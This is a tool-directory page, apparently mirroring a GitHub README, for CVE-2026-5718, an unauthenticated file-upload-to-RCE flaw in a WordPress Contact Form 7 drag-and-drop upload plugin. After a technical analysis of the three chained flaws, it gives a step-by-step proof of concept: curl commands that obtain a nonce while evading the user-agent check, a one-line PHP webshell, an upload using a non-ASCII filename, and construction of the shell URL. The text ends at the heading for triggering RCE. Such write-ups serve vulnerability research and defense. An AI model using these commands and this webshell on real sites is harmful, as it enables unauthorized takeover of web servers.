Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-5718 — CVE-2026-5718: Unauthenticated File Upload To RCE in DnD Upload CF7 Plugin | Kitploit
Tools/GitHubGitHub/xxconi/cve-2026-5718
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubxxconi/cve-2026-5718

CVE-2026-5718

CVE-2026-5718: Unauthenticated File Upload To RCE in DnD Upload CF7 Plugin

View Repository
54 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-5718

CVE-2026-5718: Unauthenticated File Upload To RCE in DnD Upload CF7 Plugin

CVE-2026-5718 — DnD CF7 File Upload RCE Scanner

Plugin: Drag and Drop Multiple File Upload for Contact Form 7 Plugin Slug: drag-and-drop-multiple-file-upload-contact-form-7 CVE ID: CVE-2026-5718 CVSS Score: 8.1 (High) CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Type: Unauthenticated Arbitrary File Upload → Remote Code Execution Affected Versions: <= 1.3.9.6 Patched Version: 1.3.9.7 Release Date: April 17, 2026 Researcher: Leonid Semenenko (lsemenenko) — Wordfence


📌 About the Vulnerability

In the Drag and Drop Multiple File Upload for Contact Form 7 plugin, two independent logic flaws combine to allow unauthenticated attackers to upload a PHP webshell.

  1. Blacklist Override: A custom blacklist configuration completely replaces the default dangerous extension list instead of merging it. php is no longer blocked.

  2. Non-ASCII Bypass: The presence of non-ASCII characters in the filename prevents wpcf7_antiscript_file_name() from being called. The .php extension is preserved and the file is written to disk.


🔍 Vulnerability Summary

FieldValue
Plugin NameDrag and Drop Multiple File Upload for CF7
CVE IDCVE-2026-5718
CVSS Score8.1 (High)
Vulnerability TypeUnauthenticated Arbitrary File Upload
Affected Version<= 1.3.9.6
Patched Version1.3.9.7
PrerequisiteCF7 form with custom blacklist-types configuration

⚙️ Technical Analysis

Vulnerability 1 — Nonce Publicly Accessible (line 62)

// inc/dnd-upload-cf7.php — lines 62–71
function dnd_wpcf7_nonce_check() {
    // Only protection: User-Agent 'curl' check — easily bypassed
    if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'curl' ) !== false ) {
        wp_send_json_error('Request blocked: cURL access is forbidden.');
    }

    if( ! check_ajax_referer( 'dnd-cf7-security-nonce', false, false ) ){
        // Invalid nonce → RETURNS NEW NONCE
        wp_send_json_success( wp_create_nonce( "dnd-cf7-security-nonce" ) );
    }
}

The wp_ajax_nopriv__wpcf7_check_nonce action is publicly accessible. When an invalid nonce is sent, a new nonce is given for free. The curl check is bypassed using Mozilla UA.


Vulnerability 2 — Blacklist Replacing Instead of Merging (line 883)

// inc/dnd-upload-cf7.php — lines 883–886
$blacklist_types = dnd_cf7_not_allowed_ext();
// ↑ ~80 dangerous extensions: php, php3, php4, pht, phtml, phar...

if ( isset( $blacklist["$cf7_upload_name"] ) && ! empty( $blacklist["$cf7_upload_name"] ) ) {
    $blacklist_types = explode( '|', $blacklist["$cf7_upload_name"] );
    // ↑ ASSIGNMENT (=) — NOT MERGE
    // Custom list: only ['zip']
    // 'php' is NOT in the list anymore → accepted
}

Triggering form tag configuration:

[mfile upload-file filetypes="*" blacklist-types:zip]

Admin wants to block ZIP → plugin overwrites entire default denylist. All dangerous extensions including php are now accepted.

Additionally, the hardcoded list for filetypes="*" is also incomplete:

// line 927 — 'php', 'php3', 'php4', 'pht', 'phtml' MISSING
$not_allowed_ext = array( 'phar', 'svg', 'php5', 'php7', 'php8' );

Vulnerability 3 — Non-ASCII Bypass (line 970)

// inc/dnd-upload-cf7.php — lines 969–972
$ascii_name = dnd_cf7_remove_icons( $filename );

if ( dnd_cf7_check_ascii( $ascii_name ) ) {
    // Only called for pure-ASCII file names
    $filename = wpcf7_antiscript_file_name( $ascii_name );
    // ↑ would make shell.php → shell.php.txt — but bypassed
}
// If non-ASCII character present, this block IS SKIPPED
// $filename = "shellシ.php" → .php extension preserved
// dnd_cf7_check_ascii() — lines 1029–1041
function dnd_cf7_check_ascii( $string ) {
    $string = sanitize_file_name( $string );
    // ↑ Only local copy changes, outer $filename NOT AFFECTED
    if ( mb_check_encoding( $string, 'ASCII' ) ) {
        return true;
    }
    return false;  // Non-ASCII character → false → antiscript skipped
}

🔴 Full Attack Chain

┌─────────────────────────────────────────────────────────────┐
│  POST /wp-admin/admin-ajax.php?action=_wpcf7_check_nonce   │
│  User-Agent: Mozilla/5.0  (not curl)                       │
│       │                                                     │
│       ▼                                                     │
│  {"success":true,"data":"abc123def456"}                     │
│  → Nonce obtained for free                                 │
└──────────────────────────┬──────────────────────────────────┘
                           │
┌──────────────────────────▼──────────────────────────────────┐
│  POST /wp-admin/admin-ajax.php?action=dnd_codedropz_upload  │
│  security=abc123def456                                      │
│  upload-file=shellシ.php (Content-Type: application/x-php) │
│       │                                                     │
│       ├── Nonce valid ✓                                     │
│       ├── blacklist=['zip'] → 'php' not blocked ✓          │
│       ├── dnd_cf7_check_ascii("shellシ.php") = false        │
│       ├── wpcf7_antiscript_file_name() BYPASSED ✓          │
│       └── move_uploaded_file("shellシ.php") → Written to disk│
└──────────────────────────┬──────────────────────────────────┘
                           │
┌──────────────────────────▼──────────────────────────────────┐
│  GET /wp-content/uploads/wp_dndcf7_uploads/                 │
│      wpcf7-files/<uuid>/shell%E3%82%B7.php?cmd=id          │
│       │                                                     │
│       ▼                                                     │
│  uid=33(www-data) gid=33(www-data) groups=33(www-data)     │
│  → Unauthenticated RCE ✓                                    │
└─────────────────────────────────────────────────────────────┘

🧪 Proof of Concept (Manual)

⚠️ Disclaimer: This PoC is provided for educational and defensive security research purposes only. Use only on systems you own or have explicit written authorization to test.

Prerequisites:

  • Plugin installed and active (version <= 1.3.9.6)
  • CF7 form must contain [mfile] field with blacklist-types:
    [mfile upload-file filetypes="*" blacklist-types:zip]
    

Step 1 — Get Nonce

TARGET="https://target.example.com"

NONCE=$(curl -s -X POST \
  "$TARGET/wp-admin/admin-ajax.php" \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64)" \
  --data "action=_wpcf7_check_nonce" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['data'])")

echo "Nonce: $NONCE"

Expected response:

{"success": true, "data": "abc123def456"}

Step 2 — Create Webshell with Non-ASCII Filename

# 'シ' (U+30B7 Katakana) → dnd_cf7_check_ascii() = false
SHELL_FILENAME="shellシ.php"
echo '<?php system($_GET["cmd"]); ?>' > "/tmp/${SHELL_FILENAME}"

Step 3 — Upload Shell

FORM_ID=1
FIELD_NAME="upload-file"
SESSION_FOLDER=$(uuidgen | tr '[:upper:]' '[:lower:]' | tr -d '-')

curl -s -X POST "$TARGET/wp-admin/admin-ajax.php" \
  -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64)" \
  -F "action=dnd_codedropz_upload" \
  -F "security=${NONCE}" \
  -F "form_id=${FORM_ID}" \
  -F "upload_name=${FIELD_NAME}" \
  -F "upload_folder=${SESSION_FOLDER}" \
  -F "upload-file=@/tmp/${SHELL_FILENAME};type=application/x-php"

Expected response:

{
  "success": true,
  "data": {
    "path": "<session-folder-uuid>",
    "file": "shellシ.php"
  }
}

Step 4 — Construct Shell URL

UPLOAD_PATH="<path-from-response>"
SHELL_URL="$TARGET/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/${UPLOAD_PATH}/shell%E3%82%B7.php"
echo "Shell URL: $SHELL_URL"

Step 5 — Trigger RCE

Download Tool